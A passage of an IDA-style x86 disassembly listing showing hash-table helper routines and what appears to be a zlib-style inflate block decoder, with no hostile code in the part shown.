loc_41EC63: ; CODE XREF: sub_41EBDB+3B�j
xor eax, eax
locret_41EC65: ; CODE XREF: sub_41EBDB+72�j
leave
retn 0Ch
sub_41EBDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC69 proc near ; CODE XREF: sub_410000+3E�p
; sub_414214+D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_41EDD9
push offset sub_41EB38
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_41EC8C
leave
retn 8
sub_41EC69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC8C proc near ; CODE XREF: sub_419529+1E2�p
; sub_41EC69+1A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push edi
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_C]
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_41ECB5: ; CODE XREF: sub_41EC8C+52�j
cmp [ebp+var_4], 0
jz short loc_41ECE0
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_8]
test eax, eax
jnz short loc_41ECD5
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
jmp short loc_41ED3D
; ---------------------------------------------------------------------------
loc_41ECD5: ; CODE XREF: sub_41EC8C+3D�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_41ECB5
; ---------------------------------------------------------------------------
loc_41ECE0: ; CODE XREF: sub_41EC8C+2D�j
push 0Ch
call sub_41BA4A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41ED01
xor eax, eax
mov edi, [ebp+var_C]
stosd
stosd
stosd
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
jmp short loc_41ED05
; ---------------------------------------------------------------------------
loc_41ED01: ; CODE XREF: sub_41EC8C+63�j
and [ebp+var_14], 0
loc_41ED05: ; CODE XREF: sub_41EC8C+73�j
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov eax, [eax+edx*4]
mov [ecx+8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov [eax+ecx*4], edx
loc_41ED3D: ; CODE XREF: sub_41EC8C+47�j
pop edi
leave
retn 10h
sub_41EC8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED42 proc near ; CODE XREF: sub_4182B0+6F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax+0Ch], 0
leave
retn
sub_41ED42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED59 proc near ; CODE XREF: sub_4182B0+82�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
loc_41ED60: ; CODE XREF: sub_41ED59+5D�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov eax, [eax+4]
cmp eax, [ecx]
jb short loc_41ED71
xor al, al
jmp short locret_41EDD5
; ---------------------------------------------------------------------------
loc_41ED71: ; CODE XREF: sub_41ED59+12�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_41ED91
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov edx, [ebp+var_4]
mov eax, [ecx+eax*4]
mov [edx+0Ch], eax
jmp short loc_41EDA0
; ---------------------------------------------------------------------------
loc_41ED91: ; CODE XREF: sub_41ED59+1F�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_4]
mov eax, [eax+8]
mov [ecx+0Ch], eax
loc_41EDA0: ; CODE XREF: sub_41ED59+36�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_41EDB8
mov eax, [ebp+var_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+var_4]
mov [ecx+4], eax
jmp short loc_41ED60
; ---------------------------------------------------------------------------
loc_41EDB8: ; CODE XREF: sub_41ED59+4E�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_0]
mov eax, [eax+4]
mov [ecx], eax
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov eax, [eax]
mov [ecx], eax
mov al, 1
locret_41EDD5: ; CODE XREF: sub_41ED59+16�j
leave
retn 8
sub_41ED59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EDD9 proc near ; DATA XREF: sub_41EB4C+7�o
; sub_41EBBB+7�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
pop ebp
retn
sub_41EDD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EDE8 proc near ; DATA XREF: sub_41925C+C�o
; sub_419529+1CB�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41EE22
jmp short loc_41EE06
; ---------------------------------------------------------------------------
loc_41EDFF: ; CODE XREF: sub_41EDE8+38�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41EE06: ; CODE XREF: sub_41EDE8+15�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_41EE22
mov eax, [ebp+var_8]
shl eax, 1
mov ecx, [ebp+var_4]
movzx ecx, byte ptr [ecx]
or eax, ecx
mov [ebp+var_8], eax
jmp short loc_41EDFF
; ---------------------------------------------------------------------------
loc_41EE22: ; CODE XREF: sub_41EDE8+13�j
; sub_41EDE8+26�j
mov eax, [ebp+var_8]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
leave
retn
sub_41EDE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE2E proc near ; CODE XREF: sub_41EE9A+7D�p
; sub_41F88B+F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_0]
cmp eax, ebx
push edi
jz short loc_41EE45
mov ecx, [esi+3Ch]
mov [eax], ecx
loc_41EE45: ; CODE XREF: sub_41EE2E+10�j
mov eax, [esi]
mov edi, [ebp+arg_4]
cmp eax, 4
jz short loc_41EE54
cmp eax, 5
jnz short loc_41EE5F
loc_41EE54: ; CODE XREF: sub_41EE2E+1F�j
push dword ptr [esi+0Ch]
push dword ptr [edi+28h]
call dword ptr [edi+24h]
pop ecx
pop ecx
loc_41EE5F: ; CODE XREF: sub_41EE2E+24�j
cmp dword ptr [esi], 6
jnz short loc_41EE6F
push edi
push dword ptr [esi+4]
call sub_41FEB3
pop ecx
pop ecx
loc_41EE6F: ; CODE XREF: sub_41EE2E+34�j
mov eax, [esi+28h]
mov [esi], ebx
mov [esi+34h], eax
mov [esi+30h], eax
mov eax, [esi+38h]
mov [esi+1Ch], ebx
cmp eax, ebx
mov [esi+20h], ebx
jz short loc_41EE95
push ebx
push ebx
push ebx
call eax
mov [esi+3Ch], eax
add esp, 0Ch
mov [edi+30h], eax
loc_41EE95: ; CODE XREF: sub_41EE2E+57�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41EE2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE9A proc near ; CODE XREF: sub_42021C+AF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 40h
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_41EF01
push 5A0h
push 8
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+24h], eax
test eax, eax
jnz short loc_41EED8
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
pop ecx
jmp short loc_41EF01
; ---------------------------------------------------------------------------
loc_41EED8: ; CODE XREF: sub_41EE9A+31�j
mov ebx, [ebp+arg_8]
push ebx
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+28h], eax
test eax, eax
jnz short loc_41EF05
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 10h
loc_41EF01: ; CODE XREF: sub_41EE9A+1A�j
; sub_41EE9A+3C�j
xor eax, eax
jmp short loc_41EF21
; ---------------------------------------------------------------------------
loc_41EF05: ; CODE XREF: sub_41EE9A+52�j
and dword ptr [edi], 0
add eax, ebx
mov [edi+2Ch], eax
mov eax, [ebp+arg_4]
push 0
push esi
push edi
mov [edi+38h], eax
call sub_41EE2E
add esp, 0Ch
mov eax, edi
loc_41EF21: ; CODE XREF: sub_41EE9A+69�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41EE9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF26 proc near ; CODE XREF: sub_42031E+11B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
mov [ebp+var_10], ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
cmp ecx, eax
push edi
mov [ebp+var_C], ecx
jnb short loc_41EF5E
sub eax, ecx
dec eax
jmp short loc_41EF63
; ---------------------------------------------------------------------------
loc_41EF5E: ; CODE XREF: sub_41EF26+31�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_41EF63: ; CODE XREF: sub_41EF26+36�j
mov [ebp+var_14], eax
loc_41EF66: ; CODE XREF: sub_41EF26+AD�j
; sub_41EF26+10B�j ...
mov eax, [ebx]
cmp eax, 9 ; switch 10 cases
ja loc_41F82B ; default
jmp ds:off_41F863[eax*4] ; switch jump
loc_41EF78: ; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_4] ; jumptable 0041EF71 case 0
mov esi, [ebp+arg_0]
mov edx, [ebp+var_10]
cmp edi, 3
jnb short loc_41EFB2
loc_41EF86: ; CODE XREF: sub_41EF26+8A�j
cmp [ebp+var_8], 0
jz loc_41F567
movzx eax, byte ptr [edx]
and [ebp+arg_8], 0
dec [ebp+var_8]
mov ecx, edi
add edi, 8
shl eax, cl
mov [ebp+var_4], edi
or esi, eax
inc edx
cmp edi, 3
mov [ebp+arg_0], esi
mov [ebp+var_10], edx
jb short loc_41EF86
loc_41EFB2: ; CODE XREF: sub_41EF26+5E�j
mov eax, esi
and eax, 7
mov ecx, eax
shr eax, 1
and ecx, 1
sub eax, 0
mov [ebx+18h], ecx
jz short loc_41F036
dec eax
jz short loc_41EFE8
dec eax
jz short loc_41EFD5
dec eax
jz loc_41F582
jmp short loc_41EF66
; ---------------------------------------------------------------------------
loc_41EFD5: ; CODE XREF: sub_41EF26+A4�j
push 3
pop eax
shr esi, 3
sub edi, eax
mov [ebp+arg_0], esi
mov [ebp+var_4], edi
jmp loc_41F0C2
; ---------------------------------------------------------------------------
loc_41EFE8: ; CODE XREF: sub_41EF26+A1�j
mov edi, [ebp+arg_4]
lea eax, [ebp+var_1C]
push edi
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_28]
push eax
call sub_420B8A
push edi
push [ebp+var_1C]
push [ebp+var_20]
push [ebp+var_24]
push [ebp+var_28]
call sub_41F8C1
add esp, 28h
mov [ebx+4], eax
test eax, eax
jz loc_41F5B2
shr esi, 3
sub [ebp+var_4], 3
mov [ebp+arg_0], esi
mov dword ptr [ebx], 6
jmp loc_41EF66
; ---------------------------------------------------------------------------
loc_41F036: ; CODE XREF: sub_41EF26+9E�j
sub edi, 3
mov dword ptr [ebx], 1
mov ecx, edi
and ecx, 7
shr esi, 3
shr esi, cl
sub edi, ecx
mov [ebp+var_4], edi
mov [ebp+arg_0], esi
jmp loc_41EF66
; ---------------------------------------------------------------------------
loc_41F056: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov ecx, [ebp+var_4] ; jumptable 0041EF71 case 1
mov esi, [ebp+arg_0]
cmp ecx, 20h
jnb short loc_41F08A
mov edx, [ebp+var_10]
xor edi, edi
loc_41F066: ; CODE XREF: sub_41EF26+160�j
cmp [ebp+var_8], edi
jz loc_41F5DB
movzx eax, byte ptr [edx]
dec [ebp+var_8]
mov [ebp+arg_8], edi
shl eax, cl
add ecx, 8
or esi, eax
inc edx
cmp ecx, 20h
mov [ebp+var_10], edx
jb short loc_41F066
jmp short loc_41F08D
; ---------------------------------------------------------------------------
loc_41F08A: ; CODE XREF: sub_41EF26+139�j
mov edx, [ebp+var_10]
loc_41F08D: ; CODE XREF: sub_41EF26+162�j
mov edi, esi
mov eax, esi
not edi
and eax, 0FFFFh
shr edi, 10h
xor edi, eax
jnz loc_41F5E9
mov [ebx+4], eax
xor eax, eax
cmp [ebx+4], eax
mov [ebp+var_4], eax
mov [ebp+arg_0], eax
jz short loc_41F0B8
push 2
pop eax
jmp short loc_41F0C2
; ---------------------------------------------------------------------------
loc_41F0B8: ; CODE XREF: sub_41EF26+18B�j
; sub_41EF26+288�j
mov eax, [ebx+18h]
neg eax
sbb eax, eax
and eax, 7
loc_41F0C2: ; CODE XREF: sub_41EF26+BD�j
; sub_41EF26+190�j
mov [ebx], eax
jmp loc_41EF66
; ---------------------------------------------------------------------------
loc_41F0C9: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
cmp [ebp+var_8], 0 ; jumptable 0041EF71 case 2
jz loc_41F601
mov ecx, [ebp+var_14]
test ecx, ecx
jnz loc_41F16E
mov ecx, [ebx+2Ch]
mov edx, [ebp+var_C]
cmp edx, ecx
jnz short loc_41F10B
mov eax, [ebx+30h]
mov esi, [ebx+28h]
cmp eax, esi
jz short loc_41F10B
mov edx, esi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_41F102
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_41F104
; ---------------------------------------------------------------------------
loc_41F102: ; CODE XREF: sub_41EF26+1D3�j
sub ecx, edx
loc_41F104: ; CODE XREF: sub_41EF26+1DA�j
test ecx, ecx
mov [ebp+var_14], ecx
jnz short loc_41F16E
loc_41F10B: ; CODE XREF: sub_41EF26+1C0�j
; sub_41EF26+1CA�j
push [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebx+34h], edx
push esi
push ebx
call sub_420BB9
mov edx, [ebx+34h]
mov [ebp+arg_8], eax
mov eax, [ebx+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_41F135
mov ecx, eax
sub ecx, edx
dec ecx
jmp short loc_41F13A
; ---------------------------------------------------------------------------
loc_41F135: ; CODE XREF: sub_41EF26+206�j
mov ecx, [ebx+2Ch]
sub ecx, edx
loc_41F13A: ; CODE XREF: sub_41EF26+20D�j
mov edi, [ebx+2Ch]
mov [ebp+var_14], ecx
cmp edx, edi
mov [ebp+var_18], edi
jnz short loc_41F166
mov edi, [ebx+28h]
cmp eax, edi
jz short loc_41F166
mov edx, edi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_41F15E
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_41F163
; ---------------------------------------------------------------------------
loc_41F15E: ; CODE XREF: sub_41EF26+22F�j
mov ecx, [ebp+var_18]
sub ecx, edx
loc_41F163: ; CODE XREF: sub_41EF26+236�j
mov [ebp+var_14], ecx
loc_41F166: ; CODE XREF: sub_41EF26+21F�j
; sub_41EF26+226�j
test ecx, ecx
jz loc_41F622
loc_41F16E: ; CODE XREF: sub_41EF26+1B2�j
; sub_41EF26+1E3�j
mov eax, [ebx+4]
and [ebp+arg_8], 0
cmp eax, [ebp+var_8]
jbe short loc_41F17D
mov eax, [ebp+var_8]
loc_41F17D: ; CODE XREF: sub_41EF26+252�j
cmp eax, ecx
jbe short loc_41F183
mov eax, ecx
loc_41F183: ; CODE XREF: sub_41EF26+259�j
mov esi, [ebp+var_10]
mov edi, [ebp+var_C]
mov ecx, eax
add [ebp+var_10], eax
mov edx, ecx
sub [ebp+var_8], eax
shr ecx, 2
rep movsd
add [ebp+var_C], eax
sub [ebp+var_14], eax
mov ecx, edx
and ecx, 3
rep movsb
sub [ebx+4], eax
jnz loc_41EF66
jmp loc_41F0B8
; ---------------------------------------------------------------------------
loc_41F1B3: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov ecx, [ebp+var_4] ; jumptable 0041EF71 case 3
mov edi, [ebp+var_10]
cmp ecx, 0Eh
jnb short loc_41F1E3
loc_41F1BE: ; CODE XREF: sub_41EF26+2BB�j
cmp [ebp+var_8], 0
jz loc_41F64B
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
add ecx, 8
mov [ebp+var_4], ecx
or [ebp+arg_0], eax
inc edi
cmp ecx, 0Eh
jb short loc_41F1BE
loc_41F1E3: ; CODE XREF: sub_41EF26+296�j
mov eax, [ebp+arg_0]
and eax, 3FFFh
mov ecx, eax
mov [ebx+4], eax
and ecx, 1Fh
cmp ecx, 1Dh
ja loc_41F69D
mov edx, eax
and edx, 3E0h
cmp edx, 3A0h
ja loc_41F69D
mov esi, [ebp+arg_4]
push 4
shr eax, 5
and eax, 1Fh
lea eax, [eax+ecx+102h]
push eax
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebx+0Ch], eax
test eax, eax
jz loc_41F675
shr [ebp+arg_0], 0Eh
sub [ebp+var_4], 0Eh
and dword ptr [ebx+8], 0
mov dword ptr [ebx], 4
jmp short loc_41F251
; ---------------------------------------------------------------------------
loc_41F24B: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_10] ; jumptable 0041EF71 case 4
mov esi, [ebp+arg_4]
loc_41F251: ; CODE XREF: sub_41EF26+323�j
mov eax, [ebx+4]
shr eax, 0Ah
add eax, 4
cmp [ebx+8], eax
jnb short loc_41F2BA
loc_41F25F: ; CODE XREF: sub_41EF26+392�j
mov ecx, [ebp+var_4]
loc_41F262: ; CODE XREF: sub_41EF26+361�j
cmp ecx, 3
jnb short loc_41F289
cmp [ebp+var_8], 0
jz loc_41F70D
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
or [ebp+arg_0], eax
inc edi
add ecx, 8
mov [ebp+var_4], ecx
jmp short loc_41F262
; ---------------------------------------------------------------------------
loc_41F289: ; CODE XREF: sub_41EF26+33F�j
mov ecx, [ebx+8]
mov eax, [ebp+arg_0]
mov edx, [ebx+0Ch]
and eax, 7
mov ecx, ds:dword_421058[ecx*4]
sub [ebp+var_4], 3
shr [ebp+arg_0], 3
mov [edx+ecx*4], eax
mov ecx, [ebx+4]
inc dword ptr [ebx+8]
mov eax, [ebx+8]
shr ecx, 0Ah
add ecx, 4
cmp eax, ecx
jb short loc_41F25F
loc_41F2BA: ; CODE XREF: sub_41EF26+337�j
; sub_41EF26+3AE�j
cmp dword ptr [ebx+8], 13h
jnb short loc_41F2D6
mov eax, [ebx+8]
mov ecx, [ebx+0Ch]
mov eax, ds:dword_421058[eax*4]
and dword ptr [ecx+eax*4], 0
inc dword ptr [ebx+8]
jmp short loc_41F2BA
; ---------------------------------------------------------------------------
loc_41F2D6: ; CODE XREF: sub_41EF26+398�j
push esi
lea ecx, [ebx+14h]
push dword ptr [ebx+24h]
lea eax, [ebx+10h]
push ecx
push eax
push dword ptr [ebx+0Ch]
mov dword ptr [eax], 7
call sub_420681
add esp, 14h
mov [ebp+var_14], eax
test eax, eax
jnz loc_41F6CD
and [ebx+8], eax
mov dword ptr [ebx], 5
jmp short loc_41F30F
; ---------------------------------------------------------------------------
loc_41F309: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_10] ; jumptable 0041EF71 case 5
mov esi, [ebp+arg_4]
loc_41F30F: ; CODE XREF: sub_41EF26+3E1�j
; sub_41EF26+46B�j ...
mov eax, [ebx+4]
mov ecx, [ebx+8]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
cmp ecx, eax
jnb loc_41F453
mov eax, [ebx+10h]
loc_41F332: ; CODE XREF: sub_41EF26+432�j
cmp [ebp+var_4], eax
jnb short loc_41F35A
cmp [ebp+var_8], 0
jz loc_41F70D
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_41F332
; ---------------------------------------------------------------------------
loc_41F35A: ; CODE XREF: sub_41EF26+40F�j
mov eax, ds:dword_423318[eax*4]
mov ecx, [ebx+14h]
and eax, [ebp+arg_0]
mov edx, [ecx+eax*8+4]
lea eax, [ecx+eax*8]
cmp edx, 10h
mov [ebp+var_18], edx
movzx ecx, byte ptr [eax+1]
mov [ebp+var_14], ecx
jnb short loc_41F396
shr [ebp+arg_0], cl
mov eax, ecx
mov ecx, [ebx+0Ch]
sub [ebp+var_4], eax
mov eax, [ebx+8]
mov [ecx+eax*4], edx
inc dword ptr [ebx+8]
jmp loc_41F30F
; ---------------------------------------------------------------------------
loc_41F396: ; CODE XREF: sub_41EF26+455�j
cmp edx, 12h
jnz short loc_41F3A0
push 7
pop eax
jmp short loc_41F3A3
; ---------------------------------------------------------------------------
loc_41F3A0: ; CODE XREF: sub_41EF26+473�j
lea eax, [edx-0Eh]
loc_41F3A3: ; CODE XREF: sub_41EF26+478�j
xor ecx, ecx
cmp edx, 12h
setnz cl
dec ecx
and ecx, 8
add ecx, 3
mov [ebp+var_10], ecx
loc_41F3B5: ; CODE XREF: sub_41EF26+4BB�j
mov ecx, [ebp+var_14]
lea edx, [eax+ecx]
cmp [ebp+var_4], edx
jnb short loc_41F3E3
cmp [ebp+var_8], 0
jz loc_41F70D
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_41F3B5
; ---------------------------------------------------------------------------
loc_41F3E3: ; CODE XREF: sub_41EF26+498�j
shr [ebp+arg_0], cl
mov ecx, ds:dword_423318[eax*4]
and ecx, [ebp+arg_0]
add [ebp+var_10], ecx
mov ecx, eax
shr [ebp+arg_0], cl
mov ecx, [ebp+var_14]
add eax, ecx
mov ecx, [ebx+8]
sub [ebp+var_4], eax
mov eax, [ebx+4]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
mov edx, [ebp+var_10]
add edx, ecx
cmp edx, eax
ja loc_41F731
cmp [ebp+var_18], 10h
jnz short loc_41F43D
cmp ecx, 1
jb loc_41F731
mov eax, [ebx+0Ch]
mov eax, [eax+ecx*4-4]
jmp short loc_41F43F
; ---------------------------------------------------------------------------
loc_41F43D: ; CODE XREF: sub_41EF26+503�j
xor eax, eax
loc_41F43F: ; CODE XREF: sub_41EF26+515�j
; sub_41EF26+523�j
mov edx, [ebx+0Ch]
mov [edx+ecx*4], eax
inc ecx
dec [ebp+var_10]
jnz short loc_41F43F
mov [ebx+8], ecx
jmp loc_41F30F
; ---------------------------------------------------------------------------
loc_41F453: ; CODE XREF: sub_41EF26+403�j
push esi
lea ecx, [ebp+var_2C]
push dword ptr [ebx+24h]
mov eax, [ebx+4]
and dword ptr [ebx+14h], 0
mov [ebp+var_18], 9
push ecx
lea ecx, [ebp+var_30]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
mov ecx, eax
push dword ptr [ebx+0Ch]
and eax, 1Fh
shr ecx, 5
and ecx, 1Fh
add eax, 101h
inc ecx
mov [ebp+var_10], 6
push ecx
push eax
call sub_420A87
add esp, 24h
mov [ebp+var_14], eax
test eax, eax
jnz loc_41F779
push esi
push [ebp+var_2C]
push [ebp+var_30]
push [ebp+var_10]
push [ebp+var_18]
call sub_41F8C1
add esp, 14h
test eax, eax
jz loc_41F675
push dword ptr [ebx+0Ch]
mov [ebx+4], eax
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 6
pop ecx
jmp short loc_41F4DE
; ---------------------------------------------------------------------------
loc_41F4D8: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_10] ; jumptable 0041EF71 case 6
mov esi, [ebp+arg_4]
loc_41F4DE: ; CODE XREF: sub_41EF26+5B0�j
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_41F8F5
add esp, 0Ch
cmp eax, 1
jnz loc_41F7C9
and [ebp+arg_8], 0
push esi
push dword ptr [ebx+4]
call sub_41FEB3
mov eax, [esi+4]
mov edi, [esi]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
pop ecx
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
pop ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
mov [ebp+var_10], edi
cmp ecx, eax
mov [ebp+var_C], ecx
jnb short loc_41F54D
sub eax, ecx
dec eax
jmp short loc_41F552
; ---------------------------------------------------------------------------
loc_41F54D: ; CODE XREF: sub_41EF26+620�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_41F552: ; CODE XREF: sub_41EF26+625�j
cmp dword ptr [ebx+18h], 0
mov [ebp+var_14], eax
jnz loc_41F782
and dword ptr [ebx], 0
jmp loc_41EF66
; ---------------------------------------------------------------------------
loc_41F567: ; CODE XREF: sub_41EF26+64�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], edi
and dword ptr [eax+4], 0
loc_41F574: ; CODE XREF: sub_41EF26+6C1�j
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_41F667
; ---------------------------------------------------------------------------
loc_41F582: ; CODE XREF: sub_41EF26+A7�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
shr esi, 3
add edi, 0FFFFFFFDh
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebx+20h], esi
mov [ebx+1Ch], edi
loc_41F59E: ; CODE XREF: sub_41EF26+6D9�j
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_41F821
; ---------------------------------------------------------------------------
loc_41F5B2: ; CODE XREF: sub_41EF26+F5�j
mov eax, [ebp+var_4]
mov [ebx+20h], esi
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [edi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
push 0FFFFFFFCh
sub ecx, [edi]
mov [edi], eax
mov eax, [ebp+var_C]
push edi
add [edi+8], ecx
mov [ebx+34h], eax
jmp loc_41F855
; ---------------------------------------------------------------------------
loc_41F5DB: ; CODE XREF: sub_41EF26+143�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
mov [eax+4], edi
jmp short loc_41F574
; ---------------------------------------------------------------------------
loc_41F5E9: ; CODE XREF: sub_41EF26+177�j
mov eax, [ebp+arg_4]
